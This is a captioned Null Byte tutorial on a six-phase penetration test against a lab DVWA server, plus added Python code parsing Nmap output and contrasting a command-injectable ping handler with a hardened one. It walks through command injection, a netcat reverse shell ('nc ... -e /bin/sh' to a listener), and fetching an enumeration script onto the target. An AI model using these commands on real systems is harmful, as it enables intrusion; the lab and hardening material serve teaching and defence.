Conduct a Penetration Test Like a Pro in 6 Phases [Tutorial]

Captions
On this episode of Cyber Weapons Lab we're gonna learn a six-step framework in order to pen test like a pro. [Music]

Penetration testing is a science, and just like any other science, a consistent methodology has to be applied in order to achieve good results. The six steps we're going to learn today will allow you to find and exploit vulnerabilities much more easily and much more efficiently, and they'll also allow you to learn from your failures much more easily as well. The six steps that we're going to cover today are pre-engagement, reconnaissance, vulnerability assessment, exploitation, post-exploitation and reporting.

Pre-engagement is the phase where we determine the type of device we're interested in exploiting: a personal computer, a web server or an Internet of Things device. That choice is gonna have a drastic impact on all of the following steps. It's also important in this phase to consider the legal ramifications of performing an exploitation on that type of device, as this is the point of no return.

The reconnaissance phase is where we use tools such as Nmap to scan local networks, or tools like Shodan to scan the entire Internet, to find devices that are potentially vulnerable to exploitation.

Phase three is the vulnerability assessment phase. This is where we narrow down the devices that we gathered in phase two, reconnaissance, to the devices which are known to be vulnerable to known exploits. For this we can use pre-built tools, or we can use our knowledge of outdated versions of software to find devices which are known to be vulnerable.

Stage four, exploitation, is arguably the most exciting phase of a penetration test. This is where we use all the intelligence that we've gathered in the previous three steps and apply it to exploit our targeted device. This can vary widely based on the type of exploitation, but today we're going to be showing command injection.

Stage five, post-exploitation, is only possible after a successful exploitation is completed. This is where we use our newfound access to the device in order to raise our privileges or gain permanent access to that device.

The final stage of a penetration test is reporting. This is where we gather all the knowledge that we gained throughout the penetration test, organize it and publish it so other people can be aware of this vulnerability.

On this episode of Cyber Weapons Lab we're going to be targeting a web server on our local network. We're gonna be using Nmap for reconnaissance, Nessus for vulnerability assessment, command injection in order to exploit the device, and Postenum in order to elevate our privileges on that device. If you have any problems with this tutorial, check out the article linked in the description. All you need to follow this tutorial is a computer to work with. Let's get started.

So for the reconnaissance stage we're just gonna use a simple Nmap scan. We've covered Nmap before on Null Byte, and you can check out our tutorials on null-byte.wonderhowto.com, but I'm just gonna show you a real quick one-liner that you can use to see if there are any open port 80s on your local network. To do that you just have to type in nmap, then -sV for a service scan, then select the range of IPs that you want to scan, say 192.168.1.1, and specify the subnet mask with /24, then specify port 80 with -p 80, so the whole thing is nmap -sV 192.168.1.1/24 -p 80. I'm gonna go ahead and let that run. It's gonna take a couple of seconds because it's not a huge scan, and after a couple of seconds we can see all the devices which are attached to our local network and whether port 80 is open, closed or filtered. If it's open, that means port 80 is open to use. If it's closed, that means obviously we can't use port 80. Filtered means it may or may not be open, but we can't connect to it. Usually port 80s aren't filtered; that's usually something you see with SSH or other TCP ports. But today we're gonna be interested in 192.168.1.146, and we can see that its port 80 is open. Now this is a case where I have already identified that my target is this exact device, but you can use this reconnaissance stage to find any other device which has an open port 80 on your local network.

So now that we've used some network reconnaissance to identify our target, we're gonna go to the next stage, which is vulnerability assessment. To do that we're gonna use a tool called Nessus, which has been covered on Null Byte before, and that article will be linked in the description as well. This is gonna assume that you have Nessus already up and running on a computer. To navigate to Nessus you just have to open a web browser (I'm using Firefox) and type in https://localhost:8834. Your web browser might notify you that it could be a security risk to navigate to that address, but you're just gonna let it know it's okay. Once you're here, the first time using Nessus you're gonna have to set up an account. I already have, so I'm going to log in under my account. Once you open Nessus, the main screen shows all the different scans that you've saved or have used previously. I've already done the scan because it can take a while, but I'll show you exactly how I set it up. You just press the New Scan button, and then we're gonna do a basic local network scan. We're gonna call it "Null Byte test", this is for the video tutorial, and we're just gonna save it in the default folder. You can specify the target that we identified, which is 192.168.1.146, or you can also do it like we did in Nmap: just leave it at .1 and then specify the subnet mask /24. This will basically leave the first three octets alone and just cycle through that last number of the IP. So I'm gonna save it, and then you'll see the Null Byte test, and we can run it. It's never been run before, so you can launch it, and because this is a pretty big scan it will take a while. Before I started recording I ran the scan earlier, and as you can see my Metasploitable virtual machine has turned up a lot of vulnerabilities, and there are some other devices on my network which might be susceptible to some vulnerabilities as well. So I'm gonna go ahead and see what this is vulnerable to. As you can see it's using SSL, so there are some issues with SSL, which is usually associated with port 80, and so we know that if we navigate to the web app there's probably gonna be a vulnerability there; command injection might be possible.

Once you've identified that yes, this target that I'm interested in is very vulnerable, you can carry on to the fourth step of the penetration test, which is the actual exploit, the exciting part. My demonstration for an exploit is just going to be a simple command injection, and this is a part of Metasploitable 2's framework, which is the Damn Vulnerable Web App (DVWA), but this could be substituted for any web app; this is just for demonstration purposes. If for some reason a web app allows you to ping IP addresses, then you can take advantage of that and use the computer that it's pinging from for whatever you want to do. In this case I'm gonna create a reverse shell. So I can just do a simple ping of the local host, which is 127.0.0.1, and if I submit that it'll give me some information back. Now if I specify this remote host and add an ls command after it, I'm not actually on this computer, I haven't logged into this computer at all, but I'm able to see the files on this Metasploitable computer without having to put in a password or anything. Because this is not the best way to interact with that computer, let's go ahead and create a netcat reverse shell. To do that you're gonna have to open up your terminal again, and we're gonna create a listener on our local computer. To do that you just type in nc for netcat, -l for listen, and the port you want to listen on; I'm going to do 1234, so nc -l 1234. Now it's not gonna give you any feedback; it's just already running the second you do that. So now back in the web app we're gonna specify the local host again, and then, as you can see, I typed in the command earlier as a test, but you're gonna type in nc, then the IP address of your local computer where you're sending this to, which I already know is 192.168.1.1, then the port, which is 1234, and then -e for execute, and we're going to spawn a shell in the netcat connection. So you can go ahead and submit that. It might take a second or two, and now if we go back to our terminal you can see some funky stuff happen, and it actually closed. So let's try that again. Oops, not clear. I'm gonna start listening again, and then we're gonna enter the IP and port again. Yeah, that all looks right. It's still loading. So now if you type in whoami you get www-data, and if we do ls here we can see that these are the files actually on the Metasploitable computer, and now we basically have a complete shell. We can ping from here now, and you can see it's getting this data; and then it actually closed. But from here you can move on to the post-exploitation phase of the attack.

I'm going to be using a tool from a previous video called Postenum, which you can use to scan a device and find any vulnerabilities that the device is susceptible to, so you can either raise your privileges or create a permanent backdoor into that computer. So assuming that you've been able to access the target computer, either by creating a reverse shell with command injection or whatever, we can go ahead and install Postenum onto the target computer. But first let's download it onto our own computer. Just for reference, this left black-and-green terminal is going to be representing my local computer, and this blue-and-white terminal on the right-hand side is going to be representing the target computer; this is my reverse shell into that computer. So go ahead and navigate to the Null Byte article for Postenum, and if you scroll up to one of the first steps, we can download Postenum by using the wget command, just downloading the script directly, and we're going to go ahead and install it onto our local machine. Okay, now we can see that we have Postenum there, that's postenum.sh, and let's go ahead and set up a simple HTTP server on port 1234. Okay, now if we go to our target computer, we can grab postenum.sh from our local machine with wget. Oops, you've got to specify the port, of course. There we go. Now if we look on the target machine we have Postenum, so we can go ahead and try to run Postenum like we would a normal bash script, but more often than not it's not gonna work, because it doesn't have execute privileges. To fix that you just have to use chmod. Okay, now we can go ahead and run it like we did earlier. Let me make this bigger, and as we can see, Postenum is working now. So let me show off a couple of features. First we can see what versions of software are actually installed on this computer, so we can see if there are any outdated versions which can be exploited to escalate privileges. To do that all you have to do is run ./postenum.sh -v. We can see versions for MySQL, Apache and Java, and we can check whether any of these are old, outdated and vulnerable to exploitation in 2020, or whatever year you're doing this in. One more thing we can do is see what development tools are available to us on this computer, whether PHP is installed, or Perl or Python, so we know what kind of scripts can actually be run on this computer. Oops, it's a bash file. So we got some interesting information: we can see that Python, Perl, PHP, GCC (a C/C++ compiler), cc (a C compiler) and Nmap are all installed on this computer. So if we have a Python script that we're ready to deploy that's pretty effective at escalating user privileges, then we know that we'll be able to deploy it onto this computer. We can see how files can be uploaded: FTP, netcat, wget, which is what we used to get Postenum onto this computer, and curl are all available to us. We can see what shell and terminal tools are available to us, so vi and vim are installed, Nmap is installed, Ruby, which wasn't listed earlier, and we can see where all of these environment variables point in case you want to mess with that. So that's just the basics of things you can do with Postenum to escalate your privileges in the post-exploitation stage of a penetration test.

If you liked this tutorial, be sure to check out our website, where we have hundreds of free articles and videos as well as premium paid content like the ethical hacking certification bundle, which features pen testing with OWASP ZAP, WordPress hacking and hardening, and the CompTIA Cybersecurity Analyst prep course. Check out the link in the description below. While performing all of these steps to completion may seem a little overzealous, for any complicated task such as pen testing it's important to have a proven set of steps that you can fall back on in case things go awry. I should remind you that what we showed off today was just one demonstration of these six steps; your experience with these six steps will vary widely based on the type of device that you're targeting or the type of vulnerability that you're trying to exploit. Again, if you have any problems following this video tutorial, you can check out the article in the description. If you have any ideas for a future video, hit me up on Twitter at Nik Kershaw. Thank you guys for watching, and I'll see you next time.
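The reconnaissance and vulnerability-assessment steps above (scan the /24 for port 80, then narrow to hosts whose service banner shows something outdated) can be scripted rather than eyeballed. The following is an added example, not code from the Null Byte video: it parses Nmap's grepable output format (-oG), keeps only the hosts with port 80 open, and flags Apache banners older than a threshold. The scan lines are constructed sample data in the -oG layout for a scan like nmap -sV -p 80 -oG - 192.168.1.1/24, not real results, and the version threshold is an assumption to tune to your own baseline.

```python
import re

# Constructed sample of Nmap grepable (-oG) output for a port-80 service scan.
# Each port entry is port/state/proto/owner/service/rpc/version/ and Nmap
# replaces any '/' inside a field with '|', which is why "DAV|2" appears here.
SAMPLE_GREPABLE = """\
# Nmap 7.80 scan initiated as: nmap -sV -p 80 -oG - 192.168.1.1/24
Host: 192.168.1.1 ()\tStatus: Up
Host: 192.168.1.1 ()\tPorts: 80/open/tcp//http//lighttpd 1.4.35/
Host: 192.168.1.20 ()\tPorts: 80/closed/tcp//http///
Host: 192.168.1.33 ()\tPorts: 80/filtered/tcp//http///
Host: 192.168.1.146 ()\tPorts: 80/open/tcp//http//Apache httpd 2.2.8 ((Ubuntu) DAV|2)/
# Nmap done: 256 IP addresses (4 hosts up) scanned
"""

PORT_LINE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)\s+Ports:\s+(.*)$")
APACHE_VERSION = re.compile(r"Apache httpd (\d+)\.(\d+)\.(\d+)")


def parse_grepable(text):
    """Return one dict per port entry: host, port, state, proto, service, version."""
    records = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if not m:
            continue  # comment lines and Status-only lines carry no port data
        host, _hostname, ports = m.groups()
        for entry in ports.split(","):
            fields = entry.strip().rstrip("/").split("/")
            fields += [""] * (7 - len(fields))  # pad empty trailing fields
            port, state, proto, _owner, service, _rpc, version = fields[:7]
            records.append({
                "host": host,
                "port": int(port),
                "state": state,
                "proto": proto,
                "service": service,
                # undo Nmap's '/' -> '|' escaping inside the version string
                "version": version.replace("|", "/"),
            })
    return records


def open_ports(records, port=80):
    """Reconnaissance narrowing: only hosts where the port is actually open."""
    return [r for r in records if r["port"] == port and r["state"] == "open"]


def apache_version(version_string):
    """Extract (major, minor, patch) from an 'Apache httpd x.y.z' banner, else None."""
    m = APACHE_VERSION.search(version_string)
    return tuple(int(x) for x in m.groups()) if m else None


def flag_outdated(records, min_apache=(2, 4, 0)):
    """Vulnerability-assessment candidates: open web ports whose banner reports an
    Apache httpd older than min_apache. The 2.2 branch is end-of-life (2017), so
    anything below 2.4 deserves a closer look; the threshold itself is an assumption."""
    flagged = []
    for r in open_ports(records):
        v = apache_version(r["version"])
        if v is not None and v < min_apache:
            flagged.append((r["host"], v))
    return flagged


if __name__ == "__main__":
    recs = parse_grepable(SAMPLE_GREPABLE)
    for r in recs:
        print(f"{r['host']:16} {r['port']}/{r['proto']} {r['state']:9} {r['version']}")
    print("open port 80:", [r["host"] for r in open_ports(recs)])
    print("outdated Apache:", flag_outdated(recs))
```

Run it as-is to see the sample narrowed to two open hosts and one flagged Apache 2.2.8; on a live engagement replace SAMPLE_GREPABLE with the contents of the -oG file from your own scan. A banner is only a hint: the flagged host still goes through Nessus or a manual check before it is treated as exploitable.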
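The exploitation step above works because the DVWA ping form pastes the submitted "IP address" straight into a shell command, so "127.0.0.1; ls" and a netcat reverse-shell payload are executed as extra commands. The following is an added example, not code from the video or from DVWA, showing that injection point in two forms: a vulnerable handler that builds a shell string, and a hardened one that validates the input as an IP address and execs without a shell. PING_CMD is an assumption so the example runs offline: it echoes instead of pinging (on a real box it would be ping -c 1). The payload strings are constructed and nothing is contacted; the reverse-shell payload is only shown, never executed.

```python
import ipaddress
import shlex
import subprocess

# Stand-in for "ping -c 1" so this runs offline (assumption, not real ping).
PING_CMD = "echo PING"

# Constructed payloads in the style of the video; nothing here is run against
# a real target, and REVERSE_SHELL_PAYLOAD is only built into a string below.
LS_PAYLOAD = "127.0.0.1; ls"
REVERSE_SHELL_PAYLOAD = "127.0.0.1; nc 192.168.1.1 1234 -e /bin/sh"


def build_vulnerable_command(host):
    """The exact string a vulnerable handler hands to `sh -c`: user input is
    concatenated, so every shell metacharacter in it is honoured."""
    return f"{PING_CMD} {host}"


def ping_vulnerable(host):
    """Vulnerable: shell=True means ';', '&&', '|' or $(...) in `host`
    become additional commands run as the web server user (www-data)."""
    proc = subprocess.run(build_vulnerable_command(host), shell=True,
                          capture_output=True, text=True)
    return proc.stdout + proc.stderr


def ping_hardened(host):
    """Hardened: accept only a literal IPv4/IPv6 address, then exec with an
    argv list and shell=False, so the input is one argument and nothing more."""
    try:
        addr = ipaddress.ip_address(host.strip())
    except ValueError:
        raise ValueError(f"rejected input, not an IP address: {host!r}") from None
    argv = shlex.split(PING_CMD) + [str(addr)]
    proc = subprocess.run(argv, shell=False, capture_output=True, text=True)
    return proc.stdout


def hardened_accepts(host):
    """True when the hardened handler runs the input, False when it rejects it."""
    try:
        ping_hardened(host)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for payload in ("127.0.0.1", "127.0.0.1; echo INJECTED", REVERSE_SHELL_PAYLOAD):
        print(f"input: {payload!r}")
        print("  vulnerable handler would run:", build_vulnerable_command(payload))
        print("  hardened handler accepts it:", hardened_accepts(payload))
    # Demonstrate the injection with a harmless command (no nc, no network):
    print(ping_vulnerable("127.0.0.1; echo INJECTED"), end="")
```

The hardened version makes two changes, and both matter: validation rejects "127.0.0.1; ls" before anything runs, and shell=False with an argv list means that even a validation bug could not turn the argument into a second command. Validate to an allowlist (here: anything ipaddress accepts), never by blocklisting characters.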
Info
Channel: Null Byte
Views: 96,978
Rating: 4.9574027 out of 5
Keywords: wht, wonderhowto, nullbyte, null byte, hack, hacking, hacker, hacks, hackers, how to hack, howto, how to, tutorial, guide, cyber weapon, cyber weapons, cyber, cyber weapons lab, pentesting, pentester, pentesting tools, pentesting 101, penetration testing tools, information security, penetration testing, pen testing, pen test, penetration test, cybersecurity, pen tester
Id: 8a1yTN2kFNw
Length: 13min 37sec (817 seconds)
Published: Mon Aug 24 2020